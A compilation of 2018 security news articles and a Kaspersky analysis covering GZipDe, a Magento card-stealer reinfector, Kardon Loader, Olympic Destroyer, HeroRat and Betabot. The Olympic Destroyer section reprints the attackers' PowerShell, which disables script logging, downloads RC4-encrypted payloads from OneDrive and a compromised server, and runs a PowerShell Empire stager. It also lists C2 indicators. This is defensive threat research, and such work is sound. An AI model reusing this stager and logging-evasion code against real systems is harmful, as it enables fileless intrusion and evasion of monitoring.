Metasploit has become a popular choice among threat actors, and was previously seen being used in targeted attacks associated with the Turla hackers.
The Metasploit payload delivered from 175.194.42[.]8, AlienVault says, contains a shellcode to bypass system detection, as well as a Meterpreter payload. This malicious program is a powerful backdoor capable of gathering information from the system. The malware also stays in contact with the command and control server to receive further commands.
The shellcode, the researchers explain, loads the entire DLL into memory, meaning that it works without writing information to the disk.
Called reflective DLL injection, this technique allows the attacker to “transmit any other payload in order to acquire elevated privileges and move within the local network,” AlienVault concludes.
GZipDe Downloader spotted serving a Metasploit backdoor
22.6.2018 securityaffairs Virus
Security experts from AlienVault have spotted a new piece of malware named GZipDe that was used in a cyber-espionage campaign.
GZipDe is downloader that is used by threat actors to fetch other payloads from a server controlled by attackers.
The malware was detected after user from Afghanistan has uploaded a weaponized Word document on VirusTotal service, the document refers to the Shanghai Cooperation Organization Summit.
At the time it is not possible to attribute the malicious code to a specific actor, VirusTotal doesn’t share information about the source of the upload and the target of the attack was not disclosed, the researchers were only able to analyze the sample.
“It seems very targeted,” Chris Doman, a security researcher with AlienVault told Bleeping Computer. “Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”
The malicious code was a multi-stage malware, the attack chain starts with a spear-phishing message spreading the weaponized Word document, the final goal appears to be the delivery of a Metasploit backdoor.
“This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.” reads the report published by Alien Vault.
The document was designed to trick victims into enabling macros, which then executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console which downloads a PE32 executable. The ultimate step consists of the delivery of the GZipDe malware.
The GZipDe downloader was written in .NET, and implements a custom encryption method to obfuscate process memory and evade antivirus detection.
While investigating the GZipDe downloader the experts noticed that the server used to store the payloads that were fetched by the malware was down.
Further investigation allowed AlienVault to find information about the server on the Shodan search engine that had indexed it and recorded it serving a Metasploit backdoor.
“The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:”
“The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.”
The shellcode loads the entire DLL into memory, it is a fileless malware that could allow attackers to transmit any other payload in order to acquire elevated privileges and perform lateral movements within the local network.
The choice of Metasploit is not a novelty, APT groups like Cobalt Strike and CopyKittens adopted it in their campaigns to make hard the attribution of their attacks.
Technical details including IoCs are reported in the analysis published by AlienVault.
Magento credit card stealer Reinfector allows reinfect sites with malicious code
22.6.2018 securityaffairs Virus
Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.
Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.
Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.
The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs, it is included on the main index.php and is loaded with every page visited by the users, this process ensures that the code is re-injected into multiple files of the website.
Researchers highlighted that the config.php file is automatically configured during the installation of the Magento instance and usually administrators or website owners don’t change it.
“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.
“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:
/app/code/core/Mage/Payment/Model/Method/Cc.php
/app/code/core/Mage/Payment/Model/Method/Abstract.php
/app/code/core/Mage/Customer/controllers/AccountController.php
/app/code/core/Mage/Customer/controllers/AddressController.php
/app/code/core/Mage/Admin/Model/Session.php
/app/code/core/Mage/Admin/Model/Config.php
/app/code/core/Mage/Checkout/Model/Type/Onepage.php
/app/code/core/Mage/Checkout/Model/Type/Abstract.php
The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”
The malicious code was stored on Pastebin, this choice allows attackers to remain under the radars.
Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.
“The mechanism the attackers add “error_reporting(0);”is very interesting. It avoids any error leading to the discovery of the infection.” states the post.
The patch() function is used to inject the malicious code for stealing confidential information into Magento files, it uses 4 arguments (The path of a folder, the name of a file stored in that path needs to be infected, file size that is used to check if it is necessary to reinfect the given file, a new file name to be created, and the remote URL from which the malicious code will be downloaded.
Experts noticed that the base64_decode() function is split in multiple parts to evade detection from security scanners.
“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.
Kardon Loader Allows Anyone to Build a Distribution Network
21.6.2018 securityweek Virus
The author of a newly discovered malware downloader allows interested parties to set up a botshop and build a malware distribution network, Netscout Arbor reveals.
Dubbed Kardon Loader, the downloader started being advertised on underground forums as a paid beta product on April 21, 2018. The actor behind it, using the online handler Yattaze, asks $50 for the malicious program and offers it as a standalone build, with charges for each additional rebuild. He/she also allows customers to set up a botshop and sell access to their own operation.
Downloader malware and botshops are typically used by malware authors and distributors to build networks and create botnets that are then leveraged for the distribution of information stealers, ransomware, banking Trojans, and other threats. These networks are often offered as a service on underground markets.
The newly observed Kardon Loader appears to be a rebrand of the ZeroCool botnet, which was developed by the same actor (who had an account on the forum since April 2017 and received multiple vouches for this product).
The actor, Netscout Arbor reveals, is using a professional looking advertisement for the loader, with its own logo, and provides a disclaimer claiming that the software should not be used maliciously. The developer also published a YouTube video detailing the downloader’s admin panel functionality.
Kardon Loader, the actor claims, has bot functionality, can download/execute/update/uninstall tasks, has debug and analysis protection, supports TOR and Domain Generation Algorithm (DGA), includes usermode rootkit functionality, and RC4 encryption (not yet implemented).
“ASERT found many of these features absent in the samples reviewed. All samples analyzed used hard-coded command and control (C&C) URLs instead of DGA. There was also no evidence of TOR or user mode rootkit functionality in the binaries,” the security firm reveals.
For anti-analysis, the malware downloader attempts to get the module handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and exits its process if any of the targeted handles are returned.
Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against values associated with virtual machines (such as Microsoft HV, VMware, and VBox). Should any of them be detected, the malware also exits.
The threat uses a HTTP-based C&C infrastructure and base64 encoded URL parameters. When executed, the malware sends HTTP POSTs to the C&C server, with information such as an identification number, operating system, user privilege, initial payload, computer name, user name, and processor architecture.
Depending on the server response, the malware can download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.
The administration panel has a simple design, with a dashboard where bot distribution and install statistics are displayed. A “bot store” feature allows the bot admin to generate access keys for customers, providing them with the ability to execute tasks based on the predefined parameters.
“Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking Trojans/credential theft etc. […] Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,” Netscout Arbor concludes.
Building a malware distribution network is too easy with Kardon Loader
21.6.2018 securityaffairs Virus
Researchers at Netscout Arbor have discovered a malware downloader advertised on underground forums as a paid open beta product, its name is Kardon Loader.
Researchers from Netscout Arbor have discovered a downloader advertised on underground forums dubbed Kardon Loader, it allows customers to build a malware distribution network or a botshop.
Advs for Kardon Loader were first discovered on April 21, 2018, the author who goes online with the moniker Yattaze asks $50 for the application program and offers it as a standalone build, charging users for each additional rebuild.
“Kardon Loader is a malware downloader advertised on underground forums as a paid open beta product.” reads a blog post published by Netscout Arbor.
“The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.”
Downloader malware and botshops are essential components for the creation of botnets that could be used to distribute a broad range of malware such as ransomware, banking Trojans, and cryptocurrency miners.
Crooks use to offer the access to distribution networks as a service in cybercrime underground markets.
Experts believe the Kardon Loader represents a rebrand of the ZeroCool botnet that was built by the same actor.
The advertisement for the Kardon Loader appears very professional, the actor created its own logo and provides a disclaimer claiming that the software should not be used for malicious purposes. He also published a YouTube video that shows the admin panel of the platform.
Below the bot functionalities advertised by the actor:
Bot Functionality
Download and Execute Task
Update Task
Uninstall Task
Usermode Rootkit
RC4 Encryption (Not Yet Implemented)
Debug and Analysis Protection
TOR Support
Domain Generation Algorithm (DGA)
Researchers from ASERT analyzed some samples of the malicious code and noticed that some features were not implemented, for example, all samples were using hard-coded command and control (C&C) URLs instead of DGA, both the “usermode rootkit” and Tor support were not implemented.
The experts determine that the malware downloader checks for the handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and halts its process if any of the handles are returned.
To avoid the execution in a virtualized environment, the Kardon Loader also enumerate the CPUID Vendor ID value and compare it against the following strings:
KVMKVMKVM
Microsoft Hv
VMwareVMware
XenVMMXenVMM
prl hyperv
VBoxVBoxVBox
These are known CPUID Vendor ID values associated with virtualized machines. If one of these values are detected the malware will also exit
Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against a list of known values associated with virtual machines (KVMKVMKVM, Microsoft Hv, VMwareVMware, XenVMMXenVMM, prl hyperv, VBoxVBoxVBox).
The malicious code uses a HTTP-based C&C infrastructure with URL parameters that are base64 encoded.
“Upon execution Kardon Loader will send HTTP POSTs to the C2 with the following fields:
ID = Identification Number
OS = Operating System
PV = User Privilege
IP = Initial Payload (Full Path)
CN = Computer Name
UN = User Name
CA = Processor Architecture”
In turn, the server provides instructions to the malware, such as download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.
The administration panel is very simple, it implements a dashboard that provides information about the bot distribution and statistics about the installations.
“A notable feature of this panel is the bot store functionality allowing the bot admin to generate access keys to customers that would give them the ability to execute tasks based on the predefined parameters” continues the analysis,
“Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,”
The analysis includes the IoCs that could be used by organizations to block malicious activity associated with Kardon Loader.
Olympic Destroyer is still alive
20.6.2018 Kasperksy Virus
In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.
We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.
The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.
Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.
We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.
In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.
Simplified infection procedure
Infection Analysis
In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.
One of the recent documents that we discovered had the following properties:
MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc
The embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.
Obfuscated VBA macro
Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.
It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.
There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.
Obfuscated commandline Powershell scriptlet
This script disables Powershell script logging to avoid leaving traces:
IF(${GPc}[ScriptBlockLogging])
{
${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
IF(${GPc}[ScriptBlockLogging])
{
${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}
It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.
${k}= ( .VARiabLE Bqvm ).vAlUE::”aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&(‘%’){
${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.”coUNt”])%256;
${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&(‘%’){
${i}=(${i}+1)%256;
${h}=(${h}+${s}[${I}])%256;
${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}.”LENgtH”];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
${k}= ( .VARiabLE Bqvm ).vAlUE::“aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&(‘%’){
${J}=(${j}+${S}[${_}]+${K}[${_}%${k}.“coUNt”])%256;
${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&(‘%’){
${i}=(${i}+1)%256;
${h}=(${h}+${s}[${I}])%256;
${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
${_}–Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}.“LENgtH”];
–JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
The second stage payload downloaded is an HTA file that also executes a Powershell script.
Downloaded access.log.txt
This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:
${k}= ( Get-vaRiablE R4Imz -VAl )::”aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.(‘%’){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.”COUNT”])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.(‘%’){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}.”HeaDErS”.Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}.”LeNGTh”];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
${k}= ( Get–vaRiablE R4Imz –VAl )::“aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.(‘%’){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.“COUNT”])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.(‘%’){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}–BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}.“HeaDErS”.Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}.“LeNGTh”];
–JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.
$wc.HeAders.Add(“User-Agent”,$UA);
$raw = $wc.UploadData($s + “/modules/admin.php”,”POST”,$rc4p2);
Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
$AES = $NuLl;
…
[GC]::COLLEcT();
Invoke-Empire -Servers @(($s -split “/”)[0..2] -join “/”) -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours “WORKING_HOURS_REPLACE” -KillDate “REPLACE_KILLDATE” -ProxySettings $Script:Proxy; }
$wc.HeAders.Add(“User-Agent”,$UA);
$raw = $wc.UploadData($s + “/modules/admin.php”,“POST”,$rc4p2);
Invoke–Expression $($e.GetSTRiNG($(DecrYPT–BYtEs –KeY $kEy –In $raW)));
$AES = $NuLl;
…
[GC]::COLLEcT();
Invoke–Empire –Servers @(($s –split “/”)[0..2] –join “/”) –StagingKey $SK –SessionKey $key –SessionID $ID –WorkingHours “WORKING_HOURS_REPLACE” –KillDate “REPLACE_KILLDATE” –ProxySettings $Script:Proxy; }
Powershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that allows fileless control of the compromised hosts, has modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.
Infrastructure
We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI path of discovered C2 servers included the following paths:
/components/com_tags/views
/components/com_tags/views/admin
/components/com_tags/controllers
/components/com_finder/helpers
/components/com_finder/views/
/components/com_j2xml/
/components/com_contact/controllers/
These are known directory structures used by a popular open source content management system, Joomla:
Joomla components path on Github
Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.
A compromised server using Joomla
Victims and Targets
Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.
Location of targets in recent Olympic Destroyer attacks
Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.
One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.
Decoy document using Spiez Convergence topic
Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:
Some other spear-phishing documents include words in the Russian and German language in their names:
9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
One of the documents included a lure image with perfect Russian language in it.
A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)
One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).
Another lure message to encourage the user to enable macro
According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.
Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.
Decoy document inside nakaz.doc
Further analysis of other related files suggest that the target of this document is working in the biological and epizootic threat prevention field.
Attribution
Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).
Similar obfuscated macro structure
The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).
Same MultiPage1_Layout function name used in older campaign
Conclusions
Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.
The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.
Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.
The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.
More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com
Indicators Of Compromise
File Hashes
9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc
Domains and IPs
79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php
'Olympic Destroyer' Malware Spotted in New Attacks
19.6.2018 securityweek Virus
Olympic Destroyer, the malware involved in a campaign targeting this year’s Olympic Winter Games in Pyeongchang, South Korea, has been used recently in attacks aimed at organizations in Germany, France, the Netherlands, Russia, Switzerland and Ukraine.
Olympic Destroyer is designed to wipe files and make systems inoperable, and steal passwords from browsers and Windows. The malware was used during the Olympics in an attack that disrupted IT systems, including the official event website, display monitors, and Wi-Fi connections.
Researchers noted after the attack that the hackers behind the operation planted sophisticated false flags inside Olympic Destroyer. Various clues suggested that the campaign could have been the work of North Korea, Russia or China.
Kaspersky Lab spotted new attacks involving Olympic Destroyer in May and June, and the list of targets raises even more questions about the threat actor’s goals and motives.
The latest attacks targeted financial companies in Russia and European organizations focusing on protection against chemical and biological threats, including in Germany, France, the Netherlands, Switzerland and Ukraine.
The malware was delivered using spear-phishing emails carrying malicious documents. Many of the decoy documents referenced bio-chemical threat research, and some of the text was written in perfect Russian, which suggests that a native speaker helped write it.
The attack also involved PowerShell scripts and Powershell Empire, an open-source framework that allows fileless control of the compromised machine. The malware was hosted and controlled using hacked web servers running vulnerable versions of the Joomla content management system.
The fact that financial organizations were also targeted could mean one of several things. It’s possible that the Olympic Destroyer malware is used by multiple threat groups, including one that is financially motivated. It could also be a result of cyberattack outsourcing, which researchers claim is not uncommon for nation state actors, or the financial-focused attacks could be part of another false flag operation. In any case, the new attacks involving Olympic Destroyer are significant.
“It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits,” Kaspersky researchers warned.
HeroRat Controls Infected Android Devices via Telegram
19.6.2018 securityweek Android Virus
A newly detailed Android remote access Trojan (RAT) is leveraging Telegram’s bot functionality to control infected devices, ESET reveals.
Dubbed HeroRat, the malware has been spreading since at least August 2017. As of March 2018, the Trojan’s source code has been available for free on Telegram hacking channels, resulting in hundreds of variants emerging in attacks.
Although the source code is available for free, one of these variants is being sold on a dedicated Telegram channel at three price points, depending on functionality. A support video channel is also available, the security company has discovered.
“It is unclear whether this variant was created from the leaked source code, or if it is the ‘original’ whose source code was leaked,” ESET’s Lukas Stefanko notes in a blog post.
HeroRat differs from other Telegram-abusing Android RATs in that it has been developed from scratch in C#, using the Xamarin framework, Stefanko says. This is a rare combination for Android malware, as previously analyzed Trojans were written in standard Android Java.
Moreover, the malware author has adapted the Telegram protocol to the used programming language. Instead of using the Telegram Bot API as other RATs, the new threat uses Telesharp, a library for creating Telegram bots with C#. All communication to and from the infected devices is performed using the Telegram protocol.
The new malware is being distributed via third-party app stores, social media, and messaging apps, in various appealing guises (apps promising free Bitcoins, free Internet, and more followers on social media), mostly in Iran.
The malicious program is compatible with all Android versions, but it requires users to grant it a broad range of permissions, sometimes even activating its app as device administrator. Based on these permissions, the threat can then erase all data on the device, lock the screen, change passwords, and change password rules.
After the installation has been completed and the malware is launched, a popup appears (in either English or Persian), claiming that the app can’t run and that it is being uninstalled. The victim is then informed the uninstallation has been completed, and the app icon disappears.
The malware, however, continues to run in the background, and the attacker can start using Telegram’s bot functionality to control the newly infected device. A bot operated via the Telegram app controls each compromised device, Stefanko says.
HeroRat can spy on victims and exfiltrate files from the infected devices. It can intercept text messages, steal contacts, send text messages, and make calls, record audio and screen, obtain device location, and control the device’s settings.
These capabilities are accessible through clickable buttons in the Telegram bot interface, making it very easy for attackers to control victimized devices.
The malware author has put for sale bronze, silver, and gold panels, offered at $25, $50, and $100, respectively. The malware’s source code, on the other hand, is available at $650, offered by HeroRat’s (ambitious) author themselves.
“With the malware’s source code recently made available for free, new mutations could be developed and deployed anywhere in the world,” Stefanko notes.
“To avoid falling victim to Android malware, stick to the official Google Play store when downloading apps, make sure to read user reviews before downloading anything to your device and pay attention to what permissions you grant to apps both before and after installation,” the researcher concludes.
Multi-Layered Infection Attack Installs Betabot Malware
19.6.2018 securityweek Virus
The Betabot Trojan is being spread in a multi-stage attack that starts with malicious Office documents attempting to exploit a 17-year old vulnerability.
Betabot is a piece of malware that evolved from being a banking Trojan to a password stealer, and then a botnet capable of distributing ransomware and other malicious programs. Although readily available for purchase on underground markets at around $120, a cracked version of the malware was also observed in early 2017.
The recently spotted attacks start with a Word document attempting to exploit CVE-2017–11882, a vulnerability introduced in November 2000 in the Microsoft Equation Editor (EQNEDT32.EXE) component. Discovered only last year, the security bug was manually patched by Microsoft in late 2017.
As part of this attack, the actor embedded an OLE object into a specially crafted RTF file to execute commands on the victim system. The embedded objects (inteldriverupd1.sct, task.bat, decoy.doc, exe.exe, and 2nd.bat) pose as legitimate software to gain the intended victim’s trust.
